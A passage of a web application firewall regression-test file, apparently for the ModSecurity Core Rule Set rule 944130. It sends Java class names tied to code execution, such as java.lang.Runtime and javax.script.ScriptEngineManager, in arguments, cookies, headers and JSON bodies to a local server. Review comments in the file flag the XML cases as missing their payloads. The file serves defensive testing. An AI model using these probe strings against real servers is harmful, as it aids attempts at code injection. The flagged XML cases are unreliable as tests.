# shown here. "XML attribute value" sends only "element_value", which contains
# none of the keyword its desc names, and the two element cases send the bare
# keyword under Content-Type application/xml. The markup looks stripped during
# extraction; restore the payloads from the upstream file before relying on
# these cases, because as written they do not test what their desc says.
#
# The Cookie and "test" header values are plain (unquoted) scalars; they parse
# to the same strings a quoted form would.
#
# NOTE(review): layout restored from whitespace-collapsed text. The list-item
# indent assumes these entries sit under a parent key outside this excerpt;
# confirm against the file.

  # --- keyword: java.lang.Runtime (group continues from above: 345 to 351) ---
  - test_title: 944130-345
    desc: "Request header test includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.Runtime
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-346
    desc: "XML attribute value includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-347
    desc: "XML element value includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Runtime"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-348
    desc: "Nested XML element value includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Runtime"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-349
    desc: "Content-Type text/plain includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Runtime"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-350
    desc: "Content-Type application/json arg value includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.Runtime\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-351
    desc: "Content-Type application/json arg name includes keyword java.lang.Runtime"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.Runtime\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: java.lang.String (352 to 362) ---
  - test_title: 944130-352
    desc: "Argument test includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.String"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-353
    desc: "Argument name includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.String=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-354
    desc: "Cookie test includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.String
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-355
    desc: "Cookie name includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.String=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-356
    desc: "Request header test includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.String
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-357
    desc: "XML attribute value includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-358
    desc: "XML element value includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.String"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-359
    desc: "Nested XML element value includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.String"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-360
    desc: "Content-Type text/plain includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.String"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-361
    desc: "Content-Type application/json arg value includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.String\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-362
    desc: "Content-Type application/json arg name includes keyword java.lang.String"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.String\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: java.lang.StringBuilder (363 to 373) ---
  - test_title: 944130-363
    desc: "Argument test includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.StringBuilder"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-364
    desc: "Argument name includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.StringBuilder=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-365
    desc: "Cookie test includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.StringBuilder
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-366
    desc: "Cookie name includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.StringBuilder=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-367
    desc: "Request header test includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.StringBuilder
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-368
    desc: "XML attribute value includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-369
    desc: "XML element value includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.StringBuilder"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-370
    desc: "Nested XML element value includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.StringBuilder"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-371
    desc: "Content-Type text/plain includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.StringBuilder"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-372
    desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.StringBuilder\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-373
    desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.StringBuilder\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: java.lang.System (374 to 384) ---
  - test_title: 944130-374
    desc: "Argument test includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.System"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-375
    desc: "Argument name includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.System=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-376
    desc: "Cookie test includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.System
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-377
    desc: "Cookie name includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.System=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-378
    desc: "Request header test includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.System
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-379
    desc: "XML attribute value includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"  # NOTE(review): keyword absent as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-380
    desc: "XML element value includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.System"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-381
    desc: "Nested XML element value includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.System"  # NOTE(review): bare keyword, no XML markup as shown
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-382
    desc: "Content-Type text/plain includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.System"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-383
    desc: "Content-Type application/json arg value includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.System\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-384
    desc: "Content-Type application/json arg name includes keyword java.lang.System"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.System\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # --- keyword: javax.script.ScriptEngineManager (385 to 395) ---
  - test_title: 944130-385
    desc: "Argument test includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=javax.script.ScriptEngineManager"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-386
    desc: "Argument name includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "javax.script.ScriptEngineManager=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-387
    desc: "Cookie test includes keyword javax.script.ScriptEngineManager"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
